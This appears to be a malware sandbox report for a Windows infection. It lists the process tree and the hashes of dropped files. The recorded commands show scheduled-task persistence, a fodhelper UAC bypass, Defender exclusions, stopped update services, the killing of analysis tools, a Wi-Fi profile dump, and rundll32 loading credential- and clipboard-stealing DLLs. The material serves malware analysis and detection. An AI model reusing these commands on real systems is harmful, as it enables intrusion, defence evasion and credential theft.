C:\Windows\system32\AUDIODG.EXE 0x344 0x48c
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\474E.exe
C:\Users\Admin\AppData\Local\Temp\474E.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\4E15.exe
C:\Users\Admin\AppData\Local\Temp\4E15.exe
C:\Users\Admin\AppData\Local\Temp\is-GUFKM.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GUFKM.tmp\LzmwAqmV.tmp" /SL5="$60294,2980025,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\54AE.exe
C:\Users\Admin\AppData\Local\Temp\54AE.exe
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s
C:\Users\Admin\AppData\Local\Temp\5ABA.exe
C:\Users\Admin\AppData\Local\Temp\5ABA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 540 -ip 540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 784
C:\Users\Admin\AppData\Local\Temp\6162.exe
C:\Users\Admin\AppData\Local\Temp\6162.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2428 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\ProgramData\DefendSecurity\SecurityHealthService.Scan
C:\ProgramData\DefendSecurity\SecurityHealthService.Scan -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tS7R2.brk')}"
C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe
"C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2060 -ip 2060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 572
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\114462139309_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Roaming\uatgrtb
C:\Users\Admin\AppData\Roaming\uatgrtb
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc 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" /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f
C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
C:\Users\Public\Music\SystemProcessHost.SystemProcesses
"C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc 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
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -exEC byPASs -enc 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
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" import C:\Users\Public\Music\ass
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
| MD5 | b459dad344785ddda89ba8fe29032bab |
| SHA1 | 6eb89ddbab04f835f3bff057d61c3e74baf8a3e4 |
| SHA256 | 083dc177e96e1f8525eb6b19f742eba2029979fa764b62679a91d74d562baab1 |
| SHA512 | 83ad8d4cad05ffd02cd48ad27558b5e68027b467ac38879cee8464487b86efc8e534742526c6363d494c6ffb23cd3391f5ef686cc6cc45b64dfa1d219aeb13c5 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6vY7PH5.exe
| MD5 | b459dad344785ddda89ba8fe29032bab |
| SHA1 | 6eb89ddbab04f835f3bff057d61c3e74baf8a3e4 |
| SHA256 | 083dc177e96e1f8525eb6b19f742eba2029979fa764b62679a91d74d562baab1 |
| SHA512 | 83ad8d4cad05ffd02cd48ad27558b5e68027b467ac38879cee8464487b86efc8e534742526c6363d494c6ffb23cd3391f5ef686cc6cc45b64dfa1d219aeb13c5 |
memory/228-80-0x0000000007D20000-0x0000000007D2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
| MD5 | 3487fdeda32e2ebfbdfcabb1a734cee0 |
| SHA1 | 9f830e807c92da61b6e4dd6a29d7e67455c9777c |
| SHA256 | 69481ef7ddcf0198373b43bca21029d82e129f890d84c2a78d14fe7cbdfae2fe |
| SHA512 | c33478b63014779a12eb9ce1bc5071d8671894f1eaa832b4c880eae882bff98390c1d9b582b60b090b032accc1bc41667b7fd03129a946c8c00f626f2ec1e13f |
memory/228-86-0x0000000008C10000-0x0000000009228000-memory.dmp
memory/228-87-0x0000000007F10000-0x000000000801A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wg2VJ36.exe
| MD5 | 3487fdeda32e2ebfbdfcabb1a734cee0 |
| SHA1 | 9f830e807c92da61b6e4dd6a29d7e67455c9777c |
| SHA256 | 69481ef7ddcf0198373b43bca21029d82e129f890d84c2a78d14fe7cbdfae2fe |
| SHA512 | c33478b63014779a12eb9ce1bc5071d8671894f1eaa832b4c880eae882bff98390c1d9b582b60b090b032accc1bc41667b7fd03129a946c8c00f626f2ec1e13f |
memory/228-89-0x0000000007E00000-0x0000000007E12000-memory.dmp
memory/228-90-0x0000000007E60000-0x0000000007E9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BA09.tmp\BA0A.tmp\BA0B.bat
| MD5 | 0769624c4307afb42ff4d8602d7815ec |
| SHA1 | 786853c829f4967a61858c2cdf4891b669ac4df9 |
| SHA256 | 7da27df04c56cf1aa11d427d9a3dff48b0d0df8c11f7090eb849abee6bfe421f |
| SHA512 | df8e4c6e50c74f5daf89b3585a98980ac1dbacf4cce641571f8999e4263078e5d14863dae9cf64be4c987671a21ebdce3bf8e210715f68c5e383cc4d55f53106 |
memory/228-93-0x0000000007EA0000-0x0000000007EEC000-memory.dmp
memory/1560-94-0x0000000074860000-0x0000000075010000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ed1059501887ca58bf7183147bc7e9bd |
| SHA1 | 2f3fae395180943a637a4ae1d3a4b374b5a13a42 |
| SHA256 | 1292a748aa1f19560e5a5faee5d5c8d8e69fd5ebd83fb10451b8d213d085cd89 |
| SHA512 | d1f3897075f8c30c35ffd1aed9d60345eb924f362d50c5b35352a4e6a51cee770cb0b37394eb81d593644edf3fcb9c1b576f7db499226a9468e5b5f530dc734b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
\??\pipe\LOCAL\crashpad_2808_VPHTVPDFTXZWCUMQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5ec3b4aa7d6800902f7365093f47793b |
| SHA1 | 2beaf10914329626e767b149f4547b4bb25b9492 |
| SHA256 | 1fd2c2d8096346e5f4c4138192eafcc1d5233c9f29e245f3487980f74841a159 |
| SHA512 | a55b2911d5e3cb2868daa1d227e0ccecec199d302f63f6ff94507f38a3e9ecb090ee26a124a0aa70f1f8a11fcd2c96e47f3aaac1697003624d9b1ff2112251f5 |
\??\pipe\LOCAL\crashpad_2604_KUWILTZQZFADCHMG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1560-142-0x0000000074860000-0x0000000075010000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4fac0699e3a4d1f5547ee2aec39b693c |
| SHA1 | f51370fccf765eb0d186090f05af98bcc0ffd13e |
| SHA256 | 0056206de9f0ba07bec424f21568eec6e1d19bdd6bd13394e552fa732890784c |
| SHA512 | eda6b5e08dafaa96a2e67abe5b26ddba670fad2067cde24a4591cc525a7e469c7a2f07d45057da8162396ade830c232a3aa7b643be3c02db1390a8228d9ebc83 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d2a43fc2449d47c57276f5c40186bfeb |
| SHA1 | 750390c6b3d13b956c65b6c3d6539de0652424aa |
| SHA256 | 57f587e1445e40bc0bdc8ece614a7e3e79c0cda394a3392e4c7223a4c9221a99 |
| SHA512 | 9d8c7120e418d8a027d27d1bda116cd7157c853c672bfd3505e06c8728e025f63896ed1b180f0b068499dc691a2f0174ece9aec3ec82158826185242c5d5a080 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5ec3b4aa7d6800902f7365093f47793b |
| SHA1 | 2beaf10914329626e767b149f4547b4bb25b9492 |
| SHA256 | 1fd2c2d8096346e5f4c4138192eafcc1d5233c9f29e245f3487980f74841a159 |
| SHA512 | a55b2911d5e3cb2868daa1d227e0ccecec199d302f63f6ff94507f38a3e9ecb090ee26a124a0aa70f1f8a11fcd2c96e47f3aaac1697003624d9b1ff2112251f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
| SHA256 | 0916f816feace92a097267171f8aa8f944074530574a7aa1f9f0334899dfa3eb |
| SHA512 | 587d973b13b97c5b92621c776c18348a13ef451ccda32977baa529de33e47a27e7920a57fe7c4d0b2f0e4a8a3bca5c62cc5798cf97f19556028f88afb38b37be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8f30b8232b170bdbc7d9c741c82c4a73 |
| SHA1 | 9abfca17624e13728bd7fa6547e7e26e0695d411 |
